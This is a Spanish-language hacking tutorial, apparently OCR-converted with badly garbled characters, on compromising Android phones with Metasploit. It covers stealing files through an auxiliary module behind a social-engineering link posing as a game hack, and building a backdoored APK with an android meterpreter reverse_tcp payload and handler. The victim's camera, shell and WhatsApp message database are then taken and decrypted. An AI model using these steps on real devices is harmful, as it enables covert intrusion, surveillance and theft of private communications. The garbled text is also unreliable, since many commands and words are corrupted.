Está en la página 1de 9

PENTEST & Support

Gathering en Android y Backdoor [Con Metasploit]


Por J0K3$/Icebreaker
Nivel de Paper = Bsico

Gathering: Robo de Archivo en Android [ etas!"oit#


Hola! En esta parte del paper explicaremos como conseguir informacin del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una ve cargado usaremos el siguiente !Auxiliar" # $se a$%i"iar&/gather/android'ht(")i"e!rovider $a vieron una ve cargado , pueden %acer un !s%ow options" , si &uieren , bueno a%ora lo &ue tenemos &ue %acer es indicarles el arc%ivo a robar de android, para eso os de'o ac( una lista de los pat% de los directorios , para mi , interesantes)))))

*ueno en mi cas no coger+ ninguna de esas coger+, otras pues usare mi ma&uina virtual para , &ue no me demore muc%o tiempo , pero pueden usar una de esas, por si les interesa alg,n directorio en especial , -./! Empecemos ac( les de'o una foto de mi configuracin 0 a%ora les explicare punto por punto para &ue es cada)

*ueno, expli&uemos esto por partes)))) *i"es = Est+ sera el arc%ivo &ue robaran de android, me explico/ El pat% 1))en mi caso ser( %osts) +RIPA,-= 2e colo&u+ este !/" es lo &ue ira detr(s de la ip, pueden poner algo as3 para la ing social, por e'emplo /Hac.Pou )))por e'emplo ese supuesto %ac. para el 'uego 0 saldria as3 # !4p"/Hac.Pou .R/P0R,= Al principio saldr3a 5656 pero para no darle el puerto ese pues la direccin &uedar3a as3 al entreg(rsela a la v3ctima !ip"#5656/Hac.Pou , pues les extra7ar3a aun&ue tambi+n %a0 s%orten , pero lo podr3an ver en la barrita de arriba al e'ecutarlo)))Entonces d+'enlo como 56 0 no se visuali ara 8Por&ue es protocolo H99P:)))) *ueno le daremos la direccin &ue nos da para los ata&ues locales la de 2ocal 4p , osease le dar+ esa ip %aber &ue me muestra el exploit ;-! )

*ueno, ac( ven eso es la ip local , de el dispositivo atacado , 0 su versin de android < modelo del dispositivo =No est( mal / E% )))*ueno este ata&ue es mu0 bueno , con una combinacin &ue dir+ al final 1)) Pero pas+monos a la otra parte del paper no/ 1)=9ienen miedo/

Backdoor en Android1 ,o(ando e" 2ontro" de" dis!ositivo1 [ etas!"oit#


*ueno en est+ punto dir(n ! =Enserio/ >e puede penetrar mi android, de una forma sencilla)))salt(ndose antivirus 1))Pues si, primero actualicen metasploit si llevan tiempo sin %acerlo , pues salieron algunos mdulos nuevos bueno , pasemos a la accin primero dentro de la consola de metasploit colocaremos esto 1)

search android
*ueno ver(n los siguientes mdulos)))))

- s3! Am sacado un exploit %andler, 0 ? pa0loads)))mmm)))) sa&uemos un AP@ infectada =No/ Alaro))))bueno como creamos este ap./ Pues f(cil con msfpa0load , 0o lo creare de Beterpreter, por si no lo saben meterpreter es el !9ro0ano" de metasploit ,con funciones interesantes) Para crearlo abrimos una terminal 0 ponemos lo siguiente))))) s$do (s)!a&"oad !a&"oad/android/(eter!reter/reverse'tc! 3-0.,45I! "oca" o 6%terna5 R 7 8R$ta9Archivo1a!k5 6:e(!"o: s$do (s)!a&"oad !a&"oad/android/(eter!reter/reverse'tc! 3-0.,4;<=1;>?1;13@ R 7 /ho(e/icebreaker/6scritorio/-ackPo$1a!k *ueno , dir(n si %an %ec%o !bac.doors" para metasploit , ! C6.DE C6.DE ! , por &u+ pones !F" si siempre creamos el e'ecutable con !G" , tenemos &ue decirle a msfpa0load &ue use la salida FAH) Eso en otros pa0loads nos sacar3a el s%ellcode sin formato, pero en el caso de Android nos sacara un ap.! , 'e'e' bien =no/ Pueden comprobarlo con el comando !file nombre)ap." 0 les saldr( la info todo bien escrito))))*ueno una ve %ec%o eso, cargamos el exploit 1))) s$do (s)c"i e%!"oit/($"ti/hand"er PAA30AB4android/(eter!reter/reverse'tc! 3-0.,45.$ i! !$esta en e" backdoor5 6 e:e(!"o: s$do (s)c"i e%!"oit/($"ti/hand"er PAA30AB4android/(eter!reter/reverse'tc! 3-0.,45.$ i! !$esta en e" backdoor5 6

*ueno a%ora la victima cuando se instale la Ap., infectada nos saldr( esto))))

- s3! 9enemos la sesin ese android es nuestro! , a%ora podemos , poner Help , para ver los comandos &ue nos brinda Beterpreter ,para est+ dispositivo)

Io! cuantos comandos! Probemos alguno como )))">0sinfo")))))

Bmmm ! *uena informacin , probemos 1)HebcamJ>nap))))Est+ es para ec%ar una foto con el tel+fono infectado)))))

No s+ ve mu0 bien xK 'a'a' pero bueno, es la c(mara de mi mvil)))GK 'a'a'a'a' , 0 como vieron antes 'a'a'a no es mu0 bueno ni nuevo)))GK 'a'a''a))))*ueno probemos s%ell))))Est+ es mi comando preferido))))

- s3! , &ue bonitos directorios del android infectado 1))bueno entremos en sdcard %aber &ue encontramos))))

-%! %emos encontrado el directorio de H%atsApp)))))>algamos 0 movamos con meterpreter %acia este directorio para descargarnos algo))))

*ueno bueno, les explico lo &ue uso en la imag+n para moverme))))son estos ? comandos))) !Cd = Es para ver en &ue directorio empe amos inicialmente)))) cd = para avan ar o retroceder 8Parar retroceder ser3a as3 #" cd )) !: entramos en alguna carpeta como podria ser Katabases, 0 descargamos el arc%ivo de

la database llamado # !(sgstore1db1cr&!t" , bueno ese arc%ivo tiene las conversaciones de w%atsapp tambi+n podr3an descargar im(genes)))etc de todo , despu+s de descargarlo usen algo como un w%atsapp decripter 0 desencripten las conversaciones para leerlas)))0a are un paper de como se %acen 1) .a"$dos & D$e "es a"" servido de a"go1 ;racias a Pentest And >upport , especialmente gracias a Bavid +riEsteg$i1

También podría gustarte